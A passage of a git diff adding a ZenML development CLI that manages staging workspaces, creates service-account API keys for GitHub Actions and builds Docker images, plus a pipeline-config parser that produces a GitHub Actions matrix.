+ """ + client_id = os.environ.get("CLOUD_STAGING_CLIENT_ID") + client_secret = os.environ.get("CLOUD_STAGING_CLIENT_SECRET") + + if client_id and client_secret: + return get_token(client_id, client_secret) + + # Try to use ZenML Pro Client if credentials not in environment variables + try: + + click.echo("Credentials not found in environment variables. Trying to use existing ZenML authentication...") + client = ZenMLProClient(url=BASE_STAGING_URL) + api_token = client.api_token + + if api_token: + click.echo("Using existing ZenML authentication") + return api_token + else: + raise ValueError("Could not get authentication token from ZenML Pro Client") + + except AuthorizationException: + raise ValueError( + "You are not logged in to ZenML. Please either login with 'zenml login' " + "or set CLOUD_STAGING_CLIENT_ID and CLOUD_STAGING_CLIENT_SECRET environment variables." + ) + except Exception as e: + raise ValueError( + f"Failed to authenticate: {str(e)}. Please either login with 'zenml login' " + "or set CLOUD_STAGING_CLIENT_ID and CLOUD_STAGING_CLIENT_SECRET environment variables." + ) + + +@click.group() +def cli(): + """ZenML Dev CLI for managing workspaces and running pipelines.""" + pass + + +@cli.command("deploy") +@click.option( + "--workspace", + help="Name of the workspace to create (defaults to slugified git branch name)", + default=None +) +@click.option( + "--organization", + help="Organization ID", + envvar="DEV_ORGANIZATION_ID" +) +@click.option( + "--zenml-version", + help="ZenML version to use (defaults to value from VERSION file)", + default=None +) +@click.option( + "--helm-version", + help="Helm chart version to use" +) +@click.option( + "--docker-image", + help="Docker image to use (format: repository:tag)" +) +def deploy( + workspace: Optional[str], + organization: str, + zenml_version: Optional[str], + helm_version: Optional[str], + docker_image: Optional[str], +): + """Deploy a new workspace with the given configuration. 
+
+    Creates a new ZenML workspace in the cloud environment with the specified
+    configuration parameters. This command will wait for the workspace to become
+    available before returning.
+
+    If no workspace name is provided, uses the current git branch name (slugified).
+    If no ZenML version is provided, uses the version from the VERSION file.
+
+    Args:
+        workspace: Name of the workspace to create.
+        organization: Organization ID. Defaults to DEV_ORGANIZATION_ID env var.
+        zenml_version: ZenML version to use for the workspace.
+        helm_version: Helm chart version to use for the workspace deployment.
+        docker_image: Docker image to use, in the format repository:tag.
+
+    Examples:
+        $ ./zen-dev deploy
+        $ ./zen-dev deploy --workspace my-workspace --zenml-version 0.40.0
+        $ ./zen-dev deploy --zenml-version 0.40.0 --docker-image zenmldocker/zenml-server:custom
+    """
+    # Use default workspace name if not provided
+    if workspace is None:
+        workspace = get_default_workspace_name()
+        click.echo(f"Using git branch as workspace name: {workspace}")
+
+    # Use default ZenML version if not provided
+    if zenml_version is None:
+        zenml_version = get_zenml_version()
+        if zenml_version:
+            click.echo(f"Using ZenML version from VERSION file: {zenml_version}")
+        else:
+            click.echo("Warning: No ZenML version specified and VERSION file not found")
+            return
+
+    click.echo(f"Deploying workspace: {workspace}")
+
+    token = get_auth_token()
+
+    configuration = _build_configuration(
+        zenml_version=zenml_version,
+        docker_image=docker_image,
+        helm_chart_version=helm_version,
+    )
+
+    try:
+        workspace_data = create_workspace(
+            token=token,
+            workspace_name=workspace,
+            organization_id=organization,
+            configuration=configuration,
+        )
+        click.echo(f"Workspace created with ID: {workspace_data['id']}")
+
+        wait_for_availability(token, workspace_data["id"])
+
+        click.echo(
+            "Workspace deployed! 
Access it at: " + f"https://staging.cloud.zenml.io/workspaces/{workspace}/projects" + ) + except Exception as e: + click.echo(f"Error deploying workspace: {str(e)}", err=True) + sys.exit(1) + + +@cli.command("update") +@click.option( + "--workspace", + help="Name or ID of the workspace to update (defaults to slugified git branch name)", + default=None +) +@click.option( + "--zenml-version", + help="ZenML version to use (defaults to value from VERSION file)", + default=None +) +@click.option( + "--helm-version", + help="Helm chart version to use" +) +@click.option( + "--docker-image", + help="Docker image to use (format: repository:tag)" +) +def update( + workspace: Optional[str], + zenml_version: Optional[str], + helm_version: Optional[str], + docker_image: Optional[str], +): + """Update an existing workspace with the given configuration. + + Updates the configuration of an existing ZenML workspace in the cloud + environment. This command will wait for the workspace update to complete + before returning. + + If no workspace name is provided, uses the current git branch name (slugified). + If no ZenML version is provided, uses the version from the VERSION file. + + Args: + workspace: Name or ID of the workspace to update. + zenml_version: New ZenML version to use for the workspace. + helm_version: New Helm chart version to use for the workspace. + docker_image: New Docker image to use, in the format repository:tag. 
+ + Examples: + $ ./zen-dev update + $ ./zen-dev update --workspace my-workspace --zenml-version 0.40.1 + $ ./zen-dev update --docker-image zenmldocker/zenml-server:new-tag + """ + # Use default workspace name if not provided + if workspace is None: + workspace = get_default_workspace_name() + click.echo(f"Using git branch as workspace name: {workspace}") + + # Use default ZenML version if not provided + if zenml_version is None: + zenml_version = get_zenml_version() + if zenml_version: + click.echo(f"Using ZenML version from VERSION file: {zenml_version}") + else: + click.echo("Warning: No ZenML version specified and VERSION file not found") + return + + click.echo(f"Updating workspace: {workspace}") + + token = get_auth_token() + configuration = _build_configuration( + zenml_version=zenml_version, + docker_image=docker_image, + helm_chart_version=helm_version, + ) + + workspace_response = get_workspace(token, workspace) + + try: + update_workspace( + token=token, + workspace_name_or_id=workspace_response["id"], + configuration=configuration, + ) + click.echo("Workspace update initiated") + + wait_for_availability(token, workspace) + + click.echo( + "Workspace updated! Access it at: " + f"https://staging.cloud.zenml.io/workspaces/{workspace}/projects" + ) + except Exception as e: + click.echo(f"Error updating workspace: {str(e)}", err=True) + sys.exit(1) + + +@cli.command("destroy") +@click.option( + "--workspace", + required=False, + help="ID or name of the workspace to destroy (defaults to slugified git branch name)" +) +@click.option( + "--force", + is_flag=True, + help="Skip confirmation prompt" +) +def destroy(workspace: Optional[str], force: bool): + """Destroy an existing workspace. + + Permanently deletes a ZenML workspace and all associated resources. + By default, this command will prompt for confirmation before proceeding. + + If no workspace is provided, uses the current git branch name (slugified). 
+
+    Args:
+        workspace: ID or name of the workspace to destroy.
+        force: If True, skip the confirmation prompt.
+
+    Examples:
+        $ ./zen-dev destroy
+        $ ./zen-dev destroy --workspace my-workspace
+        $ ./zen-dev destroy --workspace 123e4567-e89b-12d3-a456-426614174000 --force
+    """
+    # Use default workspace name if not provided
+    if workspace is None:
+        workspace = get_default_workspace_name()
+        click.echo(f"Using git branch as workspace name: {workspace}")
+
+    if not force:
+        confirm = click.confirm(
+            f"Are you sure you want to destroy workspace '{workspace}'? "
+            "This action cannot be undone."
+        )
+        if not confirm:
+            click.echo("Operation cancelled.")
+            return
+
+    click.echo(f"Destroying workspace: {workspace}")
+
+    token = get_auth_token()
+
+    try:
+        # If the workspace is provided as a name (not UUID), get the ID first
+        try:
+            # Only validating the format here; raises ValueError for names.
+            UUID(workspace)
+            workspace_id = workspace
+        except ValueError:
+            # If not a valid UUID, assume it's a name and get the workspace info
+            workspace_info = get_workspace(token, workspace)
+            workspace_id = workspace_info["id"]
+            click.echo(f"Found workspace ID: {workspace_id}")
+
+        destroy_workspace(token, UUID(workspace_id))
+        click.echo(f"✅ Workspace '{workspace}' destroyed successfully.")
+    except Exception as e:
+        click.echo(f"❌ Error destroying workspace: {str(e)}", err=True)
+        sys.exit(1)
+
+
+def get_workspace_auth_token(token: str, workspace_id: str) -> str:
+    """Get a workspace-specific authorization token.
+
+    Args:
+        token: The access token for the cloud API.
+        workspace_id: The ID of the workspace to get an authorization token for.
+
+    Returns:
+        A workspace-specific authorization token.
+
+    Raises:
+        RuntimeError: If the API request fails for any reason.
+    """
+    url = f"{BASE_STAGING_URL}/auth/workspace_authorization/{workspace_id}"
+    response = requests.post(url, headers=_get_headers(token))
+    try:
+        response.raise_for_status()
+    except requests.exceptions.HTTPError:
+        raise RuntimeError(
+            f"Request failed with response content: {response.text}"
+        )
+
+    return response.json()["access_token"]
+
+
+def authenticate_with_workspace(server_url: str, workspace_auth_token: str) -> Tuple[str, str]:
+    """Authenticate with a workspace and get auth cookie and CSRF token.
+
+    Args:
+        server_url: The URL of the workspace server.
+        workspace_auth_token: The workspace-specific authorization token.
+
+    Returns:
+        A tuple of (auth_cookie, csrf_token) for subsequent API requests.
+
+    Raises:
+        RuntimeError: If authentication fails or if the required tokens are not found.
+    """
+    url = f"{server_url}/api/v1/login"
+    headers = {
+        "Authorization": f"Bearer {workspace_auth_token}",
+        "accept": "application/json"
+    }
+    # Routine request tracing belongs at DEBUG, not WARNING (leftover debug line).
+    logging.debug(f"URL: {url}")
+
+    response = requests.post(url, headers=headers)
+    try:
+        response.raise_for_status()
+    except requests.exceptions.HTTPError:
+        raise RuntimeError(
+            f"Request failed with response content: {response.text}"
+        )
+
+    cookies = response.cookies.get_dict()
+    csrf_token = response.json().get("csrf_token")
+
+    auth_cookie = cookies.get("zenml-auth")
+    if auth_cookie is None or csrf_token is None:
+        raise RuntimeError("Failed to get auth cookie or CSRF token from response")
+
+    return auth_cookie, csrf_token
+
+
+def get_service_account(
+    server_url: str,
+    auth_cookie: str,
+    csrf_token: str,
+    service_account_name: str
+) -> Optional[Dict[str, Any]]:
+    """Get a service account by name.
+
+    Uses the direct endpoint to get a service account by name or ID,
+    which is more efficient than listing all service accounts.
+
+    Args:
+        server_url: The URL of the workspace server.
+        auth_cookie: The authentication cookie for the workspace.
+        csrf_token: The CSRF token for the workspace.
+ service_account_name: The name of the service account to get. + + Returns: + The service account information as a dictionary, or None if not found. + + Raises: + RuntimeError: If the API request fails for any reason other than 404. + """ + url = f"{server_url}/api/v1/service_accounts/{service_account_name}" + headers = { + "Cookie": f"zenml-auth={auth_cookie}", + "X-CSRF-Token": csrf_token, + "Accept": "application/json" + } + + try: + response = requests.get(url, headers=headers) + response.raise_for_status() + return response.json() + except requests.exceptions.HTTPError as e: + if e.response.status_code == 404: + return None + raise RuntimeError( + f"Request failed with response content: {e.response.text}" + ) + except requests.exceptions.RequestException as e: + raise RuntimeError(f"Request failed: {str(e)}") + + +def create_service_account( + server_url: str, + auth_cookie: str, + csrf_token: str, + name: str, + description: str +) -> Dict[str, Any]: + """Create a service account in a workspace. + + Args: + server_url: The URL of the workspace server. + auth_cookie: The authentication cookie for the workspace. + csrf_token: The CSRF token for the workspace. + name: The name for the new service account. + description: The description for the new service account. + + Returns: + The created service account information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. 
+ """ + url = f"{server_url}/api/v1/service_accounts" + headers = { + "Cookie": f"zenml-auth={auth_cookie}", + "X-CSRF-Token": csrf_token, + "Content-Type": "application/json" + } + + payload = { + "name": name, + "description": description, + "active": True + } + + response = requests.post(url, headers=headers, json=payload) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +def create_api_key( + server_url: str, + auth_cookie: str, + csrf_token: str, + service_account_id: str, + name: str, + description: str +) -> Dict[str, Any]: + """Create an API key for a service account. + + Args: + server_url: The URL of the workspace server. + auth_cookie: The authentication cookie for the workspace. + csrf_token: The CSRF token for the workspace. + service_account_id: The ID of the service account to create the key for. + name: The name for the new API key. + description: The description for the new API key. + + Returns: + The created API key information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{server_url}/api/v1/service_accounts/{service_account_id}/api_keys" + headers = { + "Cookie": f"zenml-auth={auth_cookie}", + "X-CSRF-Token": csrf_token, + "Content-Type": "application/json" + } + + payload = { + "name": name, + "description": description + } + + response = requests.post(url, headers=headers, json=payload) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +@cli.command("gh-action-login") +def gh_action_login(): + """(FOR GH ACTIONS ONLY) Authenticate with a workspace with a service account. + + This command authenticates with the GH Runner with a ZenML workspace using + the current git branch name as the workspace name. 
It creates or reuses a + service account with a standardized name, and generates an API key. It + outputs GitHub Actions compatible commands that mask secrets and set outputs + for subsequent steps. + + Examples: + $ ./zen-dev gh-action-login + """ + try: + # Use git branch name for workspace + workspace = get_default_workspace_name() + click.echo(f"Using git branch as workspace name: {workspace}") + + token = get_auth_token() + + # Get workspace information + workspace_info = get_workspace(token, workspace) + workspace_id = workspace_info["id"] + workspace_name = workspace_info["name"] + server_url = workspace_info["zenml_service"]["status"]["server_url"] + + click.echo(f"Workspace found: {workspace_name} (ID: {workspace_id})") + + # Get workspace authorization token + click.echo("Getting workspace auth token") + workspace_auth_token = get_workspace_auth_token(token, workspace_id) + + # Authenticate with the workspace + click.echo("Authenticating with the workspace") + auth_cookie, csrf_token = authenticate_with_workspace(server_url, workspace_auth_token) + + # Create standard service account name based on workspace name + sa_name = f"github-actions-{workspace_name}" + sa_description = "Service account for GitHub Actions" + + # Check if service account already exists using direct endpoint + existing_sa = get_service_account( + server_url, auth_cookie, csrf_token, sa_name + ) + + if existing_sa: + click.echo(f"Using existing service account: {sa_name} (ID: {existing_sa['id']})") + service_account_id = existing_sa["id"] + else: + # Create a new service account + service_account = create_service_account( + server_url, auth_cookie, csrf_token, sa_name, sa_description + ) + service_account_id = service_account["id"] + click.echo(f"Service account created: {sa_name} (ID: {service_account_id})") + + # Create an API key + api_key_name = f"{sa_name}-key" + api_key_description = "API key for GitHub Actions" + api_key_info = create_api_key( + server_url, auth_cookie, 
csrf_token, service_account_id,
+            api_key_name, api_key_description
+        )
+
+        api_key = api_key_info["body"]["key"]
+        click.echo(f"API key created: {api_key_name}")
+
+        # Mask the secret in the runner log (still supported via stdout).
+        print(f"::add-mask::{api_key}")
+
+        # `::set-output` workflow commands are deprecated and disabled by
+        # GitHub Actions; step outputs must be appended to the file referenced
+        # by the GITHUB_OUTPUT environment variable. Fall back to plain prints
+        # when run outside of a GitHub Actions runner.
+        output_path = os.environ.get("GITHUB_OUTPUT")
+        if output_path:
+            with open(output_path, "a") as output_file:
+                output_file.write(f"server_url={server_url}\n")
+                output_file.write(f"api_key={api_key}\n")
+        else:
+            print(f"server_url={server_url}")
+            print(f"api_key={api_key}")
+
+    except Exception as e:
+        click.echo(f"Error authenticating with workspace: {str(e)}", err=True)
+        sys.exit(1)
+
+
+@cli.command("info")
+def info():
+    """Display information about the current development environment.
+
+    Shows the detected ZenML version from the VERSION file and the
+    slugified branch name that would be used as a workspace name.
+
+    Examples:
+        $ ./zen-dev info
+    """
+    branch = get_current_git_branch()
+    if branch:
+        click.echo(f"Current git branch: {branch}")
+        slug = slugify_branch_name(branch)
+        click.echo(f"Slugified name: {slug}")
+    else:
+        click.echo("No git branch detected")
+        click.echo("Default workspace name: dev")
+
+    version = get_zenml_version()
+    if version:
+        click.echo(f"ZenML version: {version}")
+    else:
+        click.echo("ZenML version: Could not determine (VERSION file not found)")
+
+
+@cli.command("build")
+@click.option(
+    "--server",
+    is_flag=True,
+    help="Build the zenml-server image instead of zenml"
+)
+@click.option(
+    "--repo",
+    required=True,
+    help="Docker repository name (required)",
+    envvar="DEV_DOCKER_REPO"
+)
+@click.option(
+    "--tag",
+    default=None,
+    help="Tag for the Docker image (defaults to slugified git branch name)"
+)
+@click.option(
+    "--push",
+    is_flag=True,
+    help="Push the image after building"
+)
+def build(server: bool, repo: str, tag: Optional[str], push: bool):
+    """Build a ZenML Docker image.
+
+    This command builds a Docker image for ZenML or ZenML Server using
+    the appropriate dev Dockerfile. By default, it builds the zenml image,
+    but you can use --server to build the zenml-server image instead.
+ + If no tag is provided, uses the current git branch name (slugified). + + Args: + server: If True, build the zenml-server image instead of zenml. + repo: Docker repository name (required, can be set with DEV_DOCKER_REPO env var). + tag: Tag for the Docker image (defaults to slugified git branch name). + push: If True, push the image after building. + + Examples: + $ ./zen-dev build --repo zenmldocker + $ ./zen-dev build --server --repo zenmldocker + $ ./zen-dev build --repo zenmldocker --tag v1.0 + $ ./zen-dev build --repo myrepo --tag test + $ ./zen-dev build --repo zenmldocker --push + """ + if not DOCKER_AVAILABLE: + click.echo("Docker Python client not found. Please install with 'pip install docker'", err=True) + sys.exit(1) + + # Use slugified git branch name as default tag if not provided + if tag is None: + tag = get_default_workspace_name() + click.echo(f"Using git branch as tag: {tag}") + + # Determine image type + image_type = "zenml-server" if server else "zenml" + image_name = f"{repo}/{image_type}:{tag}" + + # Build the Docker image + click.echo(f"Building Docker image: {image_name}...") + + try: + client = docker.from_env() + + # Find the Dockerfile path + dockerfile_path = f"docker/{image_type}-dev.Dockerfile" + if not os.path.exists(dockerfile_path): + click.echo(f"Error: Dockerfile not found at {dockerfile_path}", err=True) + sys.exit(1) + + # Build the image + click.echo("Building image... 
(this may take a while)") + image, logs = client.images.build( + path=".", + dockerfile=dockerfile_path, + tag=image_name, + buildargs={"PYTHON_VERSION": "3.11"}, + platform="linux/amd64", + rm=True + ) + + # Check for errors + for log in logs: + if isinstance(log, dict) and "error" in log: + error = log.get("error", "") + if isinstance(error, str): + click.echo(f"Error building image: {error}", err=True) + sys.exit(1) + + click.echo(f"✅ Successfully built: {image_name}") + + # Push the image if requested + if push: + click.echo(f"Pushing Docker image: {image_name}...") + click.echo("Pushing image... (this may take a while)") + + repository = f"{repo}/{image_type}" + + # Push the image and check for errors + for line in client.images.push(repository=repository, tag=tag, stream=True, decode=True): + if isinstance(line, dict) and "error" in line: + error = line.get("error", "") + if isinstance(error, str): + click.echo(f"Error pushing image: {error}", err=True) + sys.exit(1) + + click.echo(f"✅ Successfully pushed: {image_name}") + + except BuildError as e: + click.echo(f"❌ Error building image: {str(e)}", err=True) + sys.exit(1) + except APIError as e: + click.echo(f"❌ Docker API error: {str(e)}", err=True) + sys.exit(1) + except Exception as e: + click.echo(f"❌ Unexpected error: {str(e)}", err=True) + sys.exit(1) + + +if __name__ == "__main__": + cli() \ No newline at end of file diff --git a/dev/dev_pipelines_config.yaml b/dev/dev_pipelines_config.yaml new file mode 100644 index 00000000000..302340d45ab --- /dev/null +++ b/dev/dev_pipelines_config.yaml @@ -0,0 +1,24 @@ +pipeline_with_tags: + stacks: + default: + aws: + params: + first: + config: "some_config.yaml" + second: + config: "some_second_config.yaml" + +pipeline_with_metadata: + command: "python wow.py" + + stacks: + default: + gcp: requirements.txt + aws: requirements_aws.txt + params: + default: + batch_size: 32 + epochs: 10 + small: + batch_size: 16 + epochs: 5 diff --git 
a/dev/dev_pipelines_config_parser.py b/dev/dev_pipelines_config_parser.py new file mode 100755 index 00000000000..8210b679728 --- /dev/null +++ b/dev/dev_pipelines_config_parser.py @@ -0,0 +1,219 @@ +# Copyright (c) ZenML GmbH 2023. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at: +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express +# or implied. See the License for the specific language governing +# permissions and limitations under the License. +#!/usr/bin/env python3 + +import os +import sys +import yaml +import json +import argparse +from typing import Dict, List, Optional, Any, Tuple + + +def parse_input_filter(input_str: Optional[str]) -> Tuple[Optional[str], Optional[str], Optional[str]]: + """Parse the input string in the format 'pipeline_name:stack::params'. + + This function takes a filter string and breaks it down into its components + to allow filtering of pipeline configurations. + + Args: + input_str: Input string in the format 'pipeline_name:stack::params'. + Example: 'my_pipeline:aws::small' or 'my_pipeline:aws' or 'my_pipeline' + + Returns: + Tuple of (pipeline_name, stack, params) where stack and params can be None + if not specified in the input string. 
+    """
+    if not input_str:
+        return None, None, None
+
+    # Split only on the FIRST ':' — without maxsplit, an input such as
+    # 'pipeline:stack::params' is split on every ':' (including the '::'
+    # separator), so the params component after '::' would be silently lost.
+    parts = input_str.split(':', 1)
+    pipeline_name = parts[0] if parts else None
+
+    stack = None
+    params = None
+
+    if len(parts) > 1:
+        # The remainder is 'stack' or 'stack::params'; split off the params.
+        stack_params = parts[1].split('::')
+        if stack_params[0]:
+            stack = stack_params[0]
+
+        if len(stack_params) > 1 and stack_params[1]:
+            params = stack_params[1]
+
+    return pipeline_name, stack, params
+
+
+def load_config_file(file_path: str) -> Dict:
+    """Load and parse a YAML configuration file.
+
+    Args:
+        file_path: Path to the configuration file
+
+    Returns:
+        Dictionary containing the parsed configuration
+
+    Raises:
+        SystemExit: If the file doesn't exist or can't be parsed
+    """
+    if not os.path.exists(file_path):
+        print(f"Error: Configuration file '{file_path}' not found")
+        sys.exit(1)
+
+    try:
+        with open(file_path, 'r') as file:
+            return yaml.safe_load(file)
+    except Exception as e:
+        print(f"Error loading configuration file: {e}")
+        sys.exit(1)
+
+
+def format_params_as_cli_args(params: Dict) -> str:
+    """Format parameters dictionary as command-line arguments.
+
+    Converts a dictionary of parameters into a string of CLI arguments
+    in the format '--key value'.
+
+    Args:
+        params: Dictionary of parameters (key-value pairs)
+
+    Returns:
+        String of command-line arguments formatted as '--key value'
+    """
+    if not params:
+        return ""
+
+    return " ".join([f"--{key} {value}" for key, value in params.items()])
+
+
+def generate_configurations(config: Dict, pipeline_filter: Optional[str] = None,
+                           stack_filter: Optional[str] = None,
+                           params_filter: Optional[str] = None) -> List[Dict]:
+    """Generate all possible configuration combinations based on input filters.
+
+    For each pipeline in the configuration, this function generates all valid
+    combinations of stack and parameter sets, applying any filters provided.
+ + Args: + config: Configuration dictionary from the YAML file + pipeline_filter: Optional pipeline name to filter by + stack_filter: Optional stack name to filter by + params_filter: Optional parameter set name to filter by + + Returns: + List of configuration dictionaries with pipeline_name, stack, command, + and formatted parameters + """ + results = [] + + for pipeline_name, pipeline_config in config.items(): + # Skip if pipeline filter is specified and doesn't match + if pipeline_filter and pipeline_name != pipeline_filter: + continue + + command = pipeline_config.get("command", None) + + # Handle different parameter structures + params_dict = pipeline_config.get("params", {}) + + # If params is a direct dictionary, treat it as having a single default params + if params_dict and not any(isinstance(v, dict) for v in params_dict.values()): + param_sets = {"default": params_dict} + else: + param_sets = params_dict or {"default": {}} + + # Get stack information - can be a dictionary with requirements as values + stacks_config = pipeline_config.get("stacks", {"default": None}) + + # If stacks is a list, convert to a dict with None values + if isinstance(stacks_config, list): + stacks_config = {stack: None for stack in stacks_config} + + for stack_name, requirements in stacks_config.items(): + # Skip if stack filter is specified and doesn't match + if stack_filter and stack_name != stack_filter: + continue + + for param_name, param_values in param_sets.items(): + # Skip if params filter is specified and doesn't match + if params_filter and param_name != params_filter: + continue + + config_entry = { + "pipeline_name": pipeline_name, + "stack": stack_name, + } + + if command: + config_entry["command"] = command + + if requirements: + config_entry["requirements"] = requirements + + if param_values: + # Format parameters as CLI arguments + config_entry["params"] = format_params_as_cli_args(param_values) + + results.append(config_entry) + + return results + + +def 
main(): + """Main entry point for the script. + + Parses command line arguments, loads the configuration file, + generates pipeline configurations, and outputs a GitHub Actions + strategy matrix. + """ + parser = argparse.ArgumentParser( + description="Generate GitHub Actions strategy matrix from pipeline configurations" + ) + parser.add_argument( + "--config", + default="dev/dev_pipelines_config.yaml", + help="Path to the configuration file" + ) + parser.add_argument( + "--input", + help="Filter in format pipeline_name:stack::params" + ) + + args = parser.parse_args() + + # Parse input filter + pipeline_filter, stack_filter, params_filter = parse_input_filter(args.input) + + # Load configuration + config = load_config_file(args.config) + + # Generate configurations + configurations = generate_configurations( + config, + pipeline_filter=pipeline_filter, + stack_filter=stack_filter, + params_filter=params_filter + ) + + # Output GitHub Actions matrix + if not configurations: + print("No matching configurations found.") + else: + # Format for GitHub Actions matrix strategy as JSON + matrix = {"include": configurations} + print(json.dumps(matrix)) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/dev/pipelines/pipeline_with_metadata/run.py b/dev/pipelines/pipeline_with_metadata/run.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dev/pipelines/pipeline_with_tags/run.py b/dev/pipelines/pipeline_with_tags/run.py new file mode 100644 index 00000000000..ad80c3fd602 --- /dev/null +++ b/dev/pipelines/pipeline_with_tags/run.py @@ -0,0 +1,19 @@ +"""This pipeline is used to test the different sorting mechanisms.""" + +from zenml import pipeline, step + + +@step +def basic_step() -> str: + """Step to return a string.""" + return "Hello, World!" 
+ + +@pipeline(enable_cache=False) +def basic_pipeline(): + """Pipeline with tags.""" + basic_step() + + +if __name__ == "__main__": + basic_pipeline() diff --git a/zen-dev b/zen-dev index 2c9b1e24257..c835b81f0c3 100755 --- a/zen-dev +++ b/zen-dev @@ -1,5 +1,5 @@ -#!/usr/bin/env python -# Copyright (c) ZenML GmbH 2023. All Rights Reserved. +#!/usr/bin/env python3 +# Copyright (c) ZenML GmbH 2025. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -12,12 +12,15 @@ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express # or implied. See the License for the specific language governing # permissions and limitations under the License. -""" CLI callable through `./zen-dev ....`. +"""CLI callable through `./zen-dev ....`. This CLI will serve as a general interface for all convenience functions -during development.""" -from scripts.verify_flavor_url_valid import cli +during development. +""" + import sys +from dev.cli import cli + if __name__ == "__main__": sys.exit(cli())